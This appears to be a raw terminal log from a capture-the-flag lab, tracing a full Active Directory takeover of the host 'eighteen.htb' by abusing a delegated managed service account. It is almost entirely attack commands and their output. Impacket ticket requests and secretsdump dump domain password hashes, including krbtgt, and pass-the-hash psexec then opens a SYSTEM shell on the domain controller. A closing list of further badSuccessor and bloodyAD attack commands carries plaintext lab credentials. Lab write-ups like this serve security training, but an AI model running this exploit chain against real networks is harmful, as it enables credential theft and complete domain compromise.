SMB 10.10.11.95 445 DC01 [+] eighteen.htb\attacker_dMSA$:16bf641def118ba70c1d5a3d6b6baa5d
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# export KRB5CCNAME='attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 getST.py -dc-ip 10.10.11.95 -spn 'cifs/DC01.eighteen.htb' 'eighteen.htb/attacker_dmsa$' -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:88 ... OK
[*] Saving ticket in attacker_dmsa$@cifs_DC01.eighteen.htb@EIGHTEEN.HTB.ccache
export KRB5CCNAME='attacker_dmsa$@cifs_DC01.eighteen.htb@EIGHTEEN.HTB.ccache'
proxychains4 python3 secretsdump.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 python3 secretsdump.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[SNIP]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
Pwn$:12102:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
attacker_dMSA$:12104:aad3b435b51404eeaad3b435b51404ee:16bf641def118ba70c1d5a3d6b6baa5d:::
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 psexec.py -hashes :0b133be956bfaddf9cea56701affddec administrator@eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[*] Requesting shares on eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file XOfnGGpW.exe
[*] Opening SVCManager on eighteen.htb.....
[*] Creating service NEtR on eighteen.htb.....
[*] Starting service NEtR.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.11.95:445 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
proxychains4 psexec.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
┌──(root㉿kali)-[/home/…/Kali-Tools/attacktive-directory-tools/impacket/examples]
└─# proxychains4 psexec.py -k -no-pass 'attacker_dmsa$'@DC01.eighteen.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[*] Requesting shares on DC01.eighteen.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RiLWsdMX.exe
[*] Opening SVCManager on DC01.eighteen.htb.....
[*] Creating service zZAJ on DC01.eighteen.htb.....
[*] Starting service zZAJ.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC01.eighteen.htb:445 ... OK
Microsoft Windows [Version 10.0.26100.4349]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32> whoami
nt authority\system
C:\Windows\System32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is E154-392A
Directory of C:\Users\Administrator\Desktop
11/10/2025 04:39 PM <DIR> .
11/10/2025 02:15 PM <DIR> ..
12/24/2025 09:02 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,497,720,832 bytes free
C:\Users\Administrator\Desktop> type root.txt
84c21df5d97770614f050c9584065cdf
ROOT.TXT: 84c21df5d97770614f050c9584065cdf
OTHER EXPLOITS ATTEMPTS: MAY WORKS BUT WHO KNOW ?
proxychains4 python3 badsuccessor.py -dmsa-name webadmin -target-ou 'OU=Staff,DC=eighteen,DC=htb' -dc-ip 10.10.11.95 -dc-host dc01.eighteen.htb -method LDAP eighteen.htb/adam.scott:iloveyou1
proxychains4 python3 badsuccessor.py -dmsa-name webadmin -target-ou 'OU=Staff,DC=eighteen,DC=htb' -action add -target-account Administrator -dc-ip 10.10.11.95 -dc-host dc01.eighteen.htb -method LDAP eighteen.htb/adam.scott:iloveyou1
proxychains4 python3 getST.py 'eighteen.htb/adam.scott:iloveyou1' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
proxychains4 python3 secretsdump.py 'attacker_dMSA$'@eighteen.htb -hashes :5197b8c62290d67df48a5c447f4bcc2e -just-dc
proxychains4 bloodyAD -d dc01.eighteen.htb -u adam.scott -p iloveyou1 --host dc01.eighteen.htb get writable --detail
proxychains4 bloodyAD -d dc01.eighteen.htb -u adam.scott -p iloveyou1 --host dc01.eighteen.htb add badSuccessor dmsa_pwn
bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' - host DC-LAB2025–01.tryhackme.local add badSuccessor pentest2_dmsa
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
